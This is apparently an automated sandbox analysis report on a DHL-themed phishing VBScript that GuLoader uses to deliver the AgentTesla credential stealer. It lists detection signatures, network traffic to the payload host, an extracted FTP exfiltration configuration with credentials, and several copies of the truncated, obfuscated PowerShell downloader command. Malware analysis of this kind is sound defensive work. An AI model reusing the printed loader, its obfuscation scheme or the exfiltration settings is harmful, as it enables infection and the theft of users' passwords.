Windows Analysis Report
DHL_RF_20200712_BN_N0095673441.vbs

Overview

General Information

Sample name: DHL_RF_20200712_BN_N0095673441.vbs
Analysis ID: 1430128
MD5: 3ed2e1ab2cf97a15766d46588a8e1470
SHA1: 9e162dfd21865fce19f4dbd061e6d97ebcb39cf5
SHA256: 297ec7d2a4002e4b4dc52186f528e0853c231a110fc28b14c909db702c25ae7e
Tags: AgentTeslaDHLvbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Found malware configuration
Source: conhost.exe.6748.4.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
Multi AV Scanner detection for submitted file
Source: DHL_RF_20200712_BN_N0095673441.vbs Virustotal: Detection: 23% Perma Link
Source: DHL_RF_20200712_BN_N0095673441.vbs ReversingLabs: Detection: 21%
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: Binary string: .Core.pdb.s source: powershell.exe, 0000000A.00000002.2283297279.0000000007B7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2283297279.0000000007AD9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nagement.Automation.pdb source: powershell.exe, 0000000A.00000002.2287976450.0000000008C96000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.26.12.205 104.26.12.205
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Uses FTP
Source: unknown FTP traffic detected: 192.185.13.234:21 -> 192.168.2.4:49740 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 150 allowed.220-Local time is now 01:04. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vsp1/Duplo.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vsp/izoOgnnlVO233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vsp1/Duplo.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vsp/izoOgnnlVO233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: mnajjar.deCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: google.com
Source: wscript.exe, 00000000.00000003.1671838284.000001CF477B4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671339268.000001CF477B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/-w
Source: wscript.exe, 00000000.00000002.1692866742.000001CF4585A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691568074.000001CF4583E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691923254.000001CF4585A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1671772299.000001CF458F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671376985.000001CF458F2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1672152076.000001CF458F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000002.1692866742.000001CF4585A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691568074.000001CF4583E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691923254.000001CF4585A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme
Source: wscript.exe, 00000000.00000002.1692955272.000001CF45885000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691568074.000001CF4583E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691766619.000001CF45884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabxT
Source: wscript.exe, 00000000.00000003.1672126380.000001CF47731000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?a5b3f90d87
Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1867000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2461994719.000001B6C2EFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2461994719.000001B6C33F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mnajjar.de
Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1867000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mnajjar.de/vsp1/Duplo.msoP
Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mnajjar.de/vsp1/Duplo.msoXR
Source: powershell.exe, 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1641000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2276635267.0000000005111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2461994719.000001B6C1641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2276635267.0000000005111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2276635267.0000000005267000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2461994719.000001B6C2852000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2604034817.000001B6D16B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2280052237.000000000617B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_7332.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4296, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6312
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6312
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6312 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6312 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasS Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8BBF42 7_2_00007FFD9B8BBF42
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FFD9B8BB196 7_2_00007FFD9B8BB196
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_08A23080 10_2_08A23080
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0058A9E7 15_2_0058A9E7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00584A60 15_2_00584A60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00583E48 15_2_00583E48
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00584190 15_2_00584190
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0058E45B 15_2_0058E45B
Java / VBScript file with very long strings (likely obfuscated code)
Source: DHL_RF_20200712_BN_N0095673441.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_7332.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4296, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@21/9@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Luminescences.ska Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:396:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yp5pqg1d.kqs.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4296
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7332
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: DHL_RF_20200712_BN_N0095673441.vbs Virustotal: Detection: 23%
Source: DHL_RF_20200712_BN_N0095673441.vbs ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_RF_20200712_BN_N0095673441.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp 